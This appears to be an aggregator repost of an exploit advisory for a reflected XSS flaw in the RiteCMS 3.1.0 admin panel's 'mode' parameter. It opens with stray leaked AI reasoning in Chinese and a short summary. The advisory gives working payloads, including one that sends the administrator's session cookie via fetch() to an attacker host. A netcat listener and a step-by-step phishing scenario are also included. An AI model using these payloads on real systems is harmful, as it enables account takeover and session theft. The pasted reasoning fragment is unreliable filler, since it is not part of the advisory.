RiteCMS 3.1.0 Cross Site Scripting
嗯,用户让我帮忙总结一篇文章,控制在100字以内,而且不需要特定的开头。首先,我得仔细阅读文章内容。文章讲的是RiteCMS 3.1.0版本中存在反射型XSS漏洞,特别是在admin面板的mode参数里。这个漏洞可以让攻击者窃取管理员的会话cookie,进而控制整个管理员账户。 接下来,我需要提取关键信息:软件名称、版本、漏洞类型、影响以及攻击方式。然后,要确保总结简洁明了,不超过100字。可能的结构是先点出漏洞名称和位置,然后说明攻击者如何利用这个漏洞窃取信息并控制账户。 还要注意用词准确,比如“反射型XSS”、“窃取会话cookie”、“控制管理员账户”等。最后检查一下字数是否符合要求,并且确保没有使用用户禁止的开头语句。 </think> RiteCMS 3.1.0版本中存在反射型XSS漏洞,攻击者可通过admin面板的`mode`参数注入恶意脚本,窃取管理员会话cookie并控制账户。 2025-10-29 20:25:5 Author: cxsecurity.com(查看原文) 阅读量:10 收藏

## Exploit Title: RiteCMS 3.1.0 - Reflected XSS in Admin Panel ## Date: October 28, 2025 ## Exploit Author: Chokri Hammedi ## Vendor Homepage: https://ritecms.com/ ## Software Link: https://github.com/ritecms/ritecms ## Version: RiteCMS 3.1.0 ## Tested on: windows xp ## Vulnerability Description: Reflected Cross-Site Scripting (XSS) vulnerability in the `mode` parameter of the admin panel allows attackers to steal admin session cookies and compromise the admin account. ## Proof of Concept: ### Alert Proof of Concept: ```http http://ritecms.local/admin.php?mode=');alert('XSS');// ``` ### Cookie Stealing Payload: ```http http://ritecms.local/admin.php?mode=');fetch('http://192.168.1.103:8082/steal ',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:window.location.href})});// ``` ## Attack Scenario: 1. Attacker sets up listener: `nc -lvnp 8082` 2. Attacker sends malicious link to admin 3. Admin clicks link, session cookie is sent to attacker 4. Attacker uses stolen session to gain admin access



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025100017
如有侵权请联系:admin#unsafe.sh